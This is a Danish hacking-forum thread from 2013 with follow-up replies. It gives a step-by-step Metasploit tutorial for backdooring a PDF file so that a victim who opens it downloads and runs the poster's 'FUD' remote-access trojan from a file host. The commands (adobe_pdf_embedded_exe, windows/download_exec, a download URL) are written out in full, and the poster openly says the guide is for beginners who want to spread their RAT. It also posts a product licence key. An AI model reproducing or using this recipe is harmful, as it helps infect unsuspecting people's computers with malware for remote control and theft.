Credits til http://anonymouseverywhere.blogspot.dk/ , jeg har bare oversat guiden til Dansk!


Backfoor en PDF fil med din RAT

Inden du stater, så hav en PDF fil og din fud server/rat liggende på dit skrivebord i en mappe (forklaring i slutningen af tråd)

Download Metasploit direkte fra deres egen side her:
http://www.rapid7.com/products/metasploit/download.jsp

Gratis key til Metasploit 32bit: Q2ND-3CHX-WGCL-EPY9

Now let me explain how this exploit works. This is just a basic exploit that will open drops of a reverse_tcp meterpreter session on the victim when it's executed. Also, this exploit works while the PDF is open until it is migrated to another process.

Hvad du behøver for at fuldføre dette:
En PDF fil (kan fx være en guide eller ebook eller lign)
En FUD server (din RAT, husk det skal være 100% FUD)
Og Metasploit



Husk altid at tjek om din version af metasploit er up to date!
Og husk aldrig at skriv store bogstaver i metasploit (A,B C osv, kun a,b,c). Ellers vil der kommer errors, så bare følg tutorialen og skriv som jeg skriver.

Note:
Husk at have en PDF fil klar, og din server/rat uploaded til en filehost som supporter direkte links.

Nogle eksempler:


Trin 1
Først skal vi have infected vores PDF fil, før at gøre dette skal du åbne Metasploit's Console og skriv følgende:

PHP Code:
use exploit/windows/fileformat/adobe_pdf_embedded_exe

Trin 2
Efter du har skrevet den command, skal du strukturer filerne, ved at skrive følgende:

PHP Code:
set payload windows/download_exec

Trin 3
Nu skal du finde din PDF fils placering, og skrive følgende command:
Dette er bare et eksempel: C:/Users/Owner/Desktop/example.pdf

PHP Code:
set INFILENAME C:/Users/Owner/Desktop/example.pdf


Trin 4
Nu skal du bruge det direkte download link til din FUD server/rat, skriv følgende command:


PHP Code:
set url www.downloadminfil.nu/jegvilinfectedig

Nu du færdig!


Metasploirt vil automatisk gemme den færdig backdoored fil samme sted som du havde placeret din PDF fil. (Derfor jeg sagde det var nemmest hvis du lagde alle filerne på dit skrivebord i en mappe inden start)

Stop nu bare.. Den exploit er 6 måneder public overalt.

(12-10-2013, 13:34)sabu Skrev: Stop nu bare.. Den exploit er 6 måneder public overalt.

Men den virker fint, så derfor er det stadig en relevant tråd.
Du behøver ikke at kritisere alt og alle.

Man kan også bruge "evil_pdf.py" til at smide noget infected i en PDF fil. Det er et script som følger med Back Track. :)

(12-10-2013, 16:39)Doctor Blue Skrev: Men den virker fint, så derfor er det stadig en relevant tråd.
Du behøver ikke at kritisere alt og alle.

mangler vi så en tråd til samtlige exploits..

(12-10-2013, 19:33)sabu Skrev: mangler vi så en tråd til samtlige exploits..

Nej, denne tråd er interessant fordi det er en nem og brugbar vejledning for begyndere der gerne vil sprede deres RAT.
Idéen er jo ikke at dokumentere en exploit, men at lære folk hvordan de virker og hvad de kan.

Opdatere tråden lidt imorgen, med billeder og download links osv: D

(12-10-2013, 21:46)Doctor Blue Skrev: Nej, denne tråd er interessant fordi det er en nem og brugbar vejledning for begyndere der gerne vil sprede deres RAT.
Idéen er jo ikke at dokumentere en exploit, men at lære folk hvordan de virker og hvad de kan.

Det har intet med hacking at gøre.

Hvad med en guide til frameworket i stedet?

(13-10-2013, 10:41)sabu Skrev: Det har intet med hacking at gøre.

Hvad med en guide til frameworket i stedet?

https://www.shellsec.pw/showthread.php?tid=766
Det har vi allerede, men den er ikke så generel kan man sige.
Lad nu brugerne lave guides om det de har lyst til.

Tror jeg laver en YT vid når jeg lige får min stationær op og køre igen eller for instaleret metasploit på min bærbar :D